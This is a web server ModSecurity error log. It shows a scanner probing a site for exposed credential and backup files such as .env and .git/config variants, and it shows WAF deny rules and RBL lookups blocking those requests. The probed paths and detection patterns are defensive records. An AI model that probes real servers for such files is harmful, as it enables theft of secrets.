[Tue May 26 14:49:49.517941 2026] [security2:error] [pid 648203:tid 648446] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu3QAAAPY"]
[Tue May 26 14:49:49.526270 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:54270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.old"] [unique_id "ahVltbEQDDtxJNiDrdTu4wAAAI4"]
[Tue May 26 14:49:49.558098 2026] [security2:error] [pid 648203:tid 648379] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu4QAAALM"]
[Tue May 26 14:49:49.609109 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu5gAAALE"]
[Tue May 26 14:49:49.636749 2026] [security2:error] [pid 648203:tid 648333] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu6QAAAIU"]
[Tue May 26 14:49:49.712912 2026] [security2:error] [pid 648203:tid 648458] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu9QAAAQI"]
[Tue May 26 14:49:49.754590 2026] [security2:error] [pid 648203:tid 648410] [client 45.148.10.95:16580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.php"] [unique_id "ahVltbEQDDtxJNiDrdTu-QAAANI"]
[Tue May 26 14:49:49.781672 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:54308] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.swp"] [unique_id "ahVltbEQDDtxJNiDrdTu-wAAAMI"]
[Tue May 26 14:49:49.849387 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu_wAAAK0"]
[Tue May 26 14:49:49.944971 2026] [security2:error] [pid 648203:tid 648384] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvCQAAALg"]
[Tue May 26 14:49:49.945436 2026] [security2:error] [pid 648203:tid 648425] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvCAAAAOE"]
[Tue May 26 14:49:49.945464 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvBwAAAPA"]
[Tue May 26 14:49:49.951735 2026] [security2:error] [pid 648203:tid 648434] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvDQAAAOo"]
[Tue May 26 14:49:49.956801 2026] [security2:error] [pid 648203:tid 648399] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvDwAAAMc"]
[Tue May 26 14:49:50.000222 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvEgAAAJ4"]
[Tue May 26 14:49:50.013747 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:54210] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env~"] [unique_id "ahVltrEQDDtxJNiDrdTvGgAAAJ0"]
[Tue May 26 14:49:50.040423 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvFQAAANw"]
[Tue May 26 14:49:50.056136 2026] [security2:error] [pid 648203:tid 648448] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvGAAAAPg"]
[Tue May 26 14:49:50.075865 2026] [security2:error] [pid 648203:tid 648430] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvHAAAAOY"]
[Tue May 26 14:49:50.143919 2026] [security2:error] [pid 648203:tid 648344] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvIwAAAJA"]
[Tue May 26 14:49:50.144519 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvIQAAAPU"]
[Tue May 26 14:49:50.180918 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvKAAAALA"]
[Tue May 26 14:49:50.189780 2026] [security2:error] [pid 648203:tid 648396] [client 45.148.10.95:16600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config.old"] [unique_id "ahVltrEQDDtxJNiDrdTvNgAAAMQ"]
[Tue May 26 14:49:50.207219 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvMAAAALE"]
[Tue May 26 14:49:50.225384 2026] [security2:error] [pid 648203:tid 648386] [client 45.148.10.95:54304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config~"] [unique_id "ahVltrEQDDtxJNiDrdTvNwAAALo"]
[Tue May 26 14:49:50.227402 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvNQAAALI"]
[Tue May 26 14:49:50.351758 2026] [security2:error] [pid 648203:tid 648425] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvQAAAAOE"]
[Tue May 26 14:49:50.399060 2026] [security2:error] [pid 648203:tid 648428] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvRgAAAOQ"]
[Tue May 26 14:49:50.399653 2026] [security2:error] [pid 648203:tid 648356] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvQwAAAJw"]
[Tue May 26 14:49:50.419327 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:54276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config.bak"] [unique_id "ahVltrEQDDtxJNiDrdTvSgAAANk"]
[Tue May 26 14:49:50.424183 2026] [security2:error] [pid 648203:tid 648393] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvSQAAAME"]
[Tue May 26 14:49:50.575126 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvTwAAAKE"]
[Tue May 26 14:49:50.590531 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvUwAAAO4"]
[Tue May 26 14:49:50.594767 2026] [security2:error] [pid 648203:tid 648459] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvMQAAAQM"]
[Tue May 26 14:49:50.607197 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvVgAAANw"]
[Tue May 26 14:49:50.624555 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvWQAAAKU"]
[Tue May 26 14:49:50.643415 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvXgAAAIs"]
[Tue May 26 14:49:50.644440 2026] [security2:error] [pid 648203:tid 648457] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvXwAAAQE"]
[Tue May 26 14:49:50.684301 2026] [security2:error] [pid 648203:tid 648381] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvYgAAALU"]
[Tue May 26 14:49:50.703733 2026] [security2:error] [pid 648203:tid 648345] [client 65.111.11.166:18405] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVltbEQDDtxJNiDrdTu4gAAAJE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:50.752234 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvaAAAAKQ"]
[Tue May 26 14:49:50.755059 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvawAAAI0"]
[Tue May 26 14:49:50.763052 2026] [security2:error] [pid 648203:tid 648411] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvbgAAANM"]
[Tue May 26 14:49:50.783651 2026] [security2:error] [pid 648203:tid 648416] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvcQAAANg"]
[Tue May 26 14:49:50.849920 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvdAAAALw"]
[Tue May 26 14:49:50.878271 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvdwAAALI"]
[Tue May 26 14:49:50.920235 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvegAAAJI"]
[Tue May 26 14:49:50.963380 2026] [security2:error] [pid 648203:tid 648399] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvgAAAAMc"]
[Tue May 26 14:49:50.964948 2026] [security2:error] [pid 648203:tid 648340] [client 74.249.173.207:27860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVltrEQDDtxJNiDrdTvjAAAAIw"]
[Tue May 26 14:49:50.971380 2026] [security2:error] [pid 648203:tid 648356] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvhAAAAJw"]
[Tue May 26 14:49:50.999240 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvhgAAAOA"]
[Tue May 26 14:49:51.020615 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvigAAAMw"]
[Tue May 26 14:49:51.037447 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvkQAAAMA"]
[Tue May 26 14:49:51.089661 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvlAAAAO4"]
[Tue May 26 14:49:51.120637 2026] [security2:error] [pid 648203:tid 648379] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvlwAAALM"]
[Tue May 26 14:49:51.148518 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvnAAAAOk"]
[Tue May 26 14:49:51.154733 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvnwAAAM0"]
[Tue May 26 14:49:51.161850 2026] [security2:error] [pid 648203:tid 648395] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvowAAAMM"]
[Tue May 26 14:49:51.190437 2026] [security2:error] [pid 648203:tid 648457] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvpgAAAQE"]
[Tue May 26 14:49:51.210044 2026] [security2:error] [pid 648203:tid 648389] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvqgAAAL0"]
[Tue May 26 14:49:51.225670 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvrwAAAI0"]
[Tue May 26 14:49:51.298759 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvsgAAAJs"]
[Tue May 26 14:49:51.318985 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvtQAAAPU"]
[Tue May 26 14:49:51.320728 2026] [security2:error] [pid 648203:tid 648333] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvuAAAAIU"]
[Tue May 26 14:49:51.341816 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvuwAAALw"]
[Tue May 26 14:49:51.389263 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvwgAAAJI"]
[Tue May 26 14:49:51.393080 2026] [security2:error] [pid 648203:tid 648418] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvxAAAANo"]
